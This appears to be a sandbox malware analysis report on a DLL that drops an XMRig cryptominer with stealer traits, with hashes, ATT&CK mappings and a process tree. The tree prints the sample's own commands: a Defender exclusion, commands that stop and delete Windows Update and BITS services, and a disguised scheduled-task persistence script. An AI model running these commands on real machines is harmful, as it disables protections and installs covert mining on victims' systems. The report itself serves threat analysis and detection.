xmrig | a93ca655369139ae62ade78986971e87d9466400a31c5e4afc0376d960c7d7dd

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
submitted
11-09-2022 06:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3e4e0407d84ab7439ae29b79d70aac54.dll
Size

2.7MB
MD5

3e4e0407d84ab7439ae29b79d70aac54
SHA1

dffe8b6a7be96da2212f5fe0c043a3e29db37ef9
SHA256

a93ca655369139ae62ade78986971e87d9466400a31c5e4afc0376d960c7d7dd
SHA512

bc848a7be05991d627a356dd402b6a77f4188dbd6f2d1d1babb926f0a0b2cb9bbf9b2ce60763450c7fc51114338bdd642a24e8fadddfa554694ee9252833b5b5
SSDEEP

49152:Jzl1rpbUrqvv0v2rQVt8nqwI7lOOYcx2ek:P1Kqvv07noI7lOOYcD

Score

10^/10

xmrig evasion miner spyware stealer upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/2292-189-0x00007FF65F4C0000-0x00007FF65FCB4000-memory.dmp	xmrig
behavioral2/memory/2292-191-0x00007FF65F4C0000-0x00007FF65FCB4000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
11	4576	rundll32.exe
14	4576	rundll32.exe
18	4576	rundll32.exe
23	4576	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
3556	amsepknuuxqzyyvbi.exe
2332	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2292-189-0x00007FF65F4C0000-0x00007FF65FCB4000-memory.dmp	upx
behavioral2/memory/2292-191-0x00007FF65F4C0000-0x00007FF65FCB4000-memory.dmp	upx

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2332 set thread context of 4456	2332	updater.exe	127
PID 2332 set thread context of 2292	2332	updater.exe	134

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4036	sc.exe
4420	sc.exe
4160	sc.exe
3876	sc.exe
3796	sc.exe
4964	sc.exe
116	sc.exe
4632	sc.exe
4836	sc.exe
4312	sc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4576	rundll32.exe
4576	rundll32.exe
4444	powershell.exe
4444	powershell.exe
4960	powershell.exe
4960	powershell.exe
1536	powershell.exe
1536	powershell.exe
4340	powershell.exe
4340	powershell.exe
1916	powershell.exe
1916	powershell.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe
2292	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
648	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeIncreaseQuotaPrivilege	4960	powershell.exe
Token: SeSecurityPrivilege	4960	powershell.exe
Token: SeTakeOwnershipPrivilege	4960	powershell.exe
Token: SeLoadDriverPrivilege	4960	powershell.exe
Token: SeSystemProfilePrivilege	4960	powershell.exe
Token: SeSystemtimePrivilege	4960	powershell.exe
Token: SeProfSingleProcessPrivilege	4960	powershell.exe
Token: SeIncBasePriorityPrivilege	4960	powershell.exe
Token: SeCreatePagefilePrivilege	4960	powershell.exe
Token: SeBackupPrivilege	4960	powershell.exe
Token: SeRestorePrivilege	4960	powershell.exe
Token: SeShutdownPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeSystemEnvironmentPrivilege	4960	powershell.exe
Token: SeRemoteShutdownPrivilege	4960	powershell.exe
Token: SeUndockPrivilege	4960	powershell.exe
Token: SeManageVolumePrivilege	4960	powershell.exe
Token: 33	4960	powershell.exe
Token: 34	4960	powershell.exe
Token: 35	4960	powershell.exe
Token: 36	4960	powershell.exe
Token: SeIncreaseQuotaPrivilege	4960	powershell.exe
Token: SeSecurityPrivilege	4960	powershell.exe
Token: SeTakeOwnershipPrivilege	4960	powershell.exe
Token: SeLoadDriverPrivilege	4960	powershell.exe
Token: SeSystemProfilePrivilege	4960	powershell.exe
Token: SeSystemtimePrivilege	4960	powershell.exe
Token: SeProfSingleProcessPrivilege	4960	powershell.exe
Token: SeIncBasePriorityPrivilege	4960	powershell.exe
Token: SeCreatePagefilePrivilege	4960	powershell.exe
Token: SeBackupPrivilege	4960	powershell.exe
Token: SeRestorePrivilege	4960	powershell.exe
Token: SeShutdownPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeSystemEnvironmentPrivilege	4960	powershell.exe
Token: SeRemoteShutdownPrivilege	4960	powershell.exe
Token: SeUndockPrivilege	4960	powershell.exe
Token: SeManageVolumePrivilege	4960	powershell.exe
Token: 33	4960	powershell.exe
Token: 34	4960	powershell.exe
Token: 35	4960	powershell.exe
Token: 36	4960	powershell.exe
Token: SeIncreaseQuotaPrivilege	4960	powershell.exe
Token: SeSecurityPrivilege	4960	powershell.exe
Token: SeTakeOwnershipPrivilege	4960	powershell.exe
Token: SeLoadDriverPrivilege	4960	powershell.exe
Token: SeSystemProfilePrivilege	4960	powershell.exe
Token: SeSystemtimePrivilege	4960	powershell.exe
Token: SeProfSingleProcessPrivilege	4960	powershell.exe
Token: SeIncBasePriorityPrivilege	4960	powershell.exe
Token: SeCreatePagefilePrivilege	4960	powershell.exe
Token: SeBackupPrivilege	4960	powershell.exe
Token: SeRestorePrivilege	4960	powershell.exe
Token: SeShutdownPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeSystemEnvironmentPrivilege	4960	powershell.exe
Token: SeRemoteShutdownPrivilege	4960	powershell.exe
Token: SeUndockPrivilege	4960	powershell.exe
Token: SeManageVolumePrivilege	4960	powershell.exe
Token: 33	4960	powershell.exe
Token: 34	4960	powershell.exe
Token: 35	4960	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4580 wrote to memory of 4576	4580	rundll32.exe	85
PID 4580 wrote to memory of 4576	4580	rundll32.exe	85
PID 4580 wrote to memory of 4576	4580	rundll32.exe	85
PID 4576 wrote to memory of 3556	4576	rundll32.exe	86
PID 4576 wrote to memory of 3556	4576	rundll32.exe	86
PID 3556 wrote to memory of 4444	3556	amsepknuuxqzyyvbi.exe	90
PID 3556 wrote to memory of 4444	3556	amsepknuuxqzyyvbi.exe	90
PID 3556 wrote to memory of 3040	3556	amsepknuuxqzyyvbi.exe	93
PID 3556 wrote to memory of 3040	3556	amsepknuuxqzyyvbi.exe	93
PID 3556 wrote to memory of 4960	3556	amsepknuuxqzyyvbi.exe	94
PID 3556 wrote to memory of 4960	3556	amsepknuuxqzyyvbi.exe	94
PID 3040 wrote to memory of 4160	3040	cmd.exe	97
PID 3040 wrote to memory of 4160	3040	cmd.exe	97
PID 3040 wrote to memory of 3876	3040	cmd.exe	98
PID 3040 wrote to memory of 3876	3040	cmd.exe	98
PID 3040 wrote to memory of 4632	3040	cmd.exe	99
PID 3040 wrote to memory of 4632	3040	cmd.exe	99
PID 3040 wrote to memory of 4836	3040	cmd.exe	100
PID 3040 wrote to memory of 4836	3040	cmd.exe	100
PID 3040 wrote to memory of 3796	3040	cmd.exe	101
PID 3040 wrote to memory of 3796	3040	cmd.exe	101
PID 3040 wrote to memory of 3468	3040	cmd.exe	102
PID 3040 wrote to memory of 3468	3040	cmd.exe	102
PID 3040 wrote to memory of 4528	3040	cmd.exe	103
PID 3040 wrote to memory of 4528	3040	cmd.exe	103
PID 3040 wrote to memory of 3572	3040	cmd.exe	104
PID 3040 wrote to memory of 3572	3040	cmd.exe	104
PID 3040 wrote to memory of 1944	3040	cmd.exe	105
PID 3040 wrote to memory of 1944	3040	cmd.exe	105
PID 3040 wrote to memory of 1892	3040	cmd.exe	106
PID 3040 wrote to memory of 1892	3040	cmd.exe	106
PID 3556 wrote to memory of 1536	3556	amsepknuuxqzyyvbi.exe	107
PID 3556 wrote to memory of 1536	3556	amsepknuuxqzyyvbi.exe	107
PID 1536 wrote to memory of 3172	1536	powershell.exe	109
PID 1536 wrote to memory of 3172	1536	powershell.exe	109
PID 2332 wrote to memory of 4340	2332	updater.exe	111
PID 2332 wrote to memory of 4340	2332	updater.exe	111
PID 2332 wrote to memory of 1896	2332	updater.exe	113
PID 2332 wrote to memory of 1896	2332	updater.exe	113
PID 2332 wrote to memory of 1916	2332	updater.exe	114
PID 2332 wrote to memory of 1916	2332	updater.exe	114
PID 1896 wrote to memory of 4312	1896	cmd.exe	117
PID 1896 wrote to memory of 4312	1896	cmd.exe	117
PID 1896 wrote to memory of 4036	1896	cmd.exe	118
PID 1896 wrote to memory of 4036	1896	cmd.exe	118
PID 1896 wrote to memory of 4964	1896	cmd.exe	119
PID 1896 wrote to memory of 4964	1896	cmd.exe	119
PID 1896 wrote to memory of 4420	1896	cmd.exe	120
PID 1896 wrote to memory of 4420	1896	cmd.exe	120
PID 1896 wrote to memory of 116	1896	cmd.exe	121
PID 1896 wrote to memory of 116	1896	cmd.exe	121
PID 1896 wrote to memory of 1144	1896	cmd.exe	122
PID 1896 wrote to memory of 1144	1896	cmd.exe	122
PID 1896 wrote to memory of 4560	1896	cmd.exe	123
PID 1896 wrote to memory of 4560	1896	cmd.exe	123
PID 1896 wrote to memory of 1360	1896	cmd.exe	124
PID 1896 wrote to memory of 1360	1896	cmd.exe	124
PID 1896 wrote to memory of 1884	1896	cmd.exe	125
PID 1896 wrote to memory of 1884	1896	cmd.exe	125
PID 1896 wrote to memory of 3524	1896	cmd.exe	126
PID 1896 wrote to memory of 3524	1896	cmd.exe	126
PID 2332 wrote to memory of 4456	2332	updater.exe	127
PID 2332 wrote to memory of 4456	2332	updater.exe	127
PID 2332 wrote to memory of 4456	2332	updater.exe	127

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\3e4e0407d84ab7439ae29b79d70aac54.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:4580
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\3e4e0407d84ab7439ae29b79d70aac54.dll,#1
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Users\Admin\AppData\Local\Temp\amsepknuuxqzyyvbi.exe
    "C:\Users\Admin\AppData\Local\Temp\amsepknuuxqzyyvbi.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4444
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3040
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:4160
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:3876
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:4632
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:4836
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:3796
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:3468
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:4528
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:3572
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:1944
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:1892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#ddxyuoslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1536
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        5⤵
        
        PID:3172

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4340
- C:\Windows\system32\cmd.exe
  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Windows\system32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4312
- - C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4036
- - C:\Windows\system32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4964
- - C:\Windows\system32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4420
- - C:\Windows\system32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:116
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1144
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4560
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1360
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1884
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1916
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe jmcfgycslfymn
  2⤵
  PID:4456
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
    3⤵
    PID:4900
- C:\Windows\system32\cmd.exe
  cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
  2⤵
  PID:4904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name
    3⤵
    PID:380
- C:\Windows\system32\dwm.exe
  C:\Windows\system32\dwm.exe rhsgxdrgcnvokcze 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9ab2lSIri/mxz2RWaQYEWaHr+wsVwDrDaUmzhazyLU8bE+gbFvD2hyocZFBvGnOyRz2iSzhnZ7rBWrLxt5q36TsGIHyIiMTkfwiniXKP/hUp/fAVcT9dBT6tKiKkFF/MseV
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2292

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
59d97011e091004eaffb9816aa0b9abd

SHA1
1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

SHA256
18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

SHA512
d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b0da357fc8d71daf3527133bc45e155

SHA1
7faa1e0a77df2f59ec448774e184050b5d05022a

SHA256
d08bc52f466b21f62e752e3512c7dd81c63660a54e731fd3dacc79369c3629ba

SHA512
7c40eea3e327073feff4cf36a77763b4ac45777d358b4744b7e08985adbafcbe4f221bd272b1afc2430910a2df71bf7d7e48a1c4a46393ac460ea0706016874f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
055cd1930e45c3d77aa744d53bcc29d9

SHA1
af1464daf329f36930b71fb33119c61a13472b6d

SHA256
fcd4a469c653f6bd319b201326633c2183a70184bc159c071915a9c4abd92d3c

SHA512
00ee038f281f34c7d727b7d6d7734bdfc61ee742b33edc5f905adae6afa949b9a9da8c575d949e98b24b59005e469628e99f113e0fc612dc24bbba7f098fa65d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c7bd521a0b5c7a67c600ed3b26c2711a

SHA1
b9be876b963601fe541ad92d1bb75a0385d9041c

SHA256
840bab83f81fbae1008cf337a6c5dd609877e8caa56fcca9cd396b382d57a524

SHA512
7d72ab614f1f058fa4d30290b2610ff6604d5d3a47611bf04003461c3ac8d2ad230d74c0ac5bdf8e4eae8f4e6d5481124088308f549288cf931155e720032b10

Download Submit
C:\Users\Admin\AppData\Local\Temp\amsepknuuxqzyyvbi.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
C:\Users\Admin\AppData\Local\Temp\amsepknuuxqzyyvbi.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log

Filesize
142B

MD5
543c22e022ad2fe07e2fff6782b5842f

SHA1
b0ce4f26371897a0f1a3460c14520adf3d665a69

SHA256
62c97f684183ebec6c67e3cd5cb96e23435d07e0ef9687196b58a2da6d5de8a3

SHA512
f33db332015bb84e8c31dd78af7511b761e8bf7946cd046b7190df1246f7ae646e5edaa1f47dae3f3137a80607697ec08b8d198438886e8a3c16f7e9dee83640

Download Submit
memory/1536-157-0x00007FFBA96B0000-0x00007FFBAA171000-memory.dmp

Filesize
10.8MB

Download
memory/1536-161-0x00007FFBA96B0000-0x00007FFBAA171000-memory.dmp

Filesize
10.8MB

Download
memory/1916-172-0x00007FFBA96B0000-0x00007FFBAA171000-memory.dmp

Filesize
10.8MB

Download
memory/1916-180-0x00007FFBA96B0000-0x00007FFBAA171000-memory.dmp

Filesize
10.8MB

Download
memory/2292-192-0x00000174031D0000-0x00000174031F0000-memory.dmp

Filesize
128KB

Download
memory/2292-188-0x0000017403030000-0x0000017403050000-memory.dmp

Filesize
128KB

Download
memory/2292-197-0x00000174031F0000-0x0000017403210000-memory.dmp

Filesize
128KB

Download
memory/2292-196-0x00000174031D0000-0x00000174031F0000-memory.dmp

Filesize
128KB

Download
memory/2292-195-0x00000174031F0000-0x0000017403210000-memory.dmp

Filesize
128KB

Download
memory/2292-189-0x00007FF65F4C0000-0x00007FF65FCB4000-memory.dmp

Filesize
8.0MB

Download
memory/2292-190-0x0000017403070000-0x0000017403090000-memory.dmp

Filesize
128KB

Download
memory/2292-193-0x00000174031D0000-0x00000174031F0000-memory.dmp

Filesize
128KB

Download
memory/2292-194-0x00000174031D0000-0x00000174031F0000-memory.dmp

Filesize
128KB

Download
memory/2292-191-0x00007FF65F4C0000-0x00007FF65FCB4000-memory.dmp

Filesize
8.0MB

Download
memory/4340-164-0x00007FFBA96B0000-0x00007FFBAA171000-memory.dmp

Filesize
10.8MB

Download
memory/4340-165-0x00007FFBA96B0000-0x00007FFBAA171000-memory.dmp

Filesize
10.8MB

Download
memory/4444-136-0x0000025FAD530000-0x0000025FAD552000-memory.dmp

Filesize
136KB

Download
memory/4444-138-0x00007FFBA8A50000-0x00007FFBA9511000-memory.dmp

Filesize
10.8MB

Download
memory/4444-137-0x00007FFBA8A50000-0x00007FFBA9511000-memory.dmp

Filesize
10.8MB

Download
memory/4960-148-0x00007FFBA8A50000-0x00007FFBA9511000-memory.dmp

Filesize
10.8MB

Download
memory/4960-154-0x00007FFBA8A50000-0x00007FFBA9511000-memory.dmp

Filesize
10.8MB

Download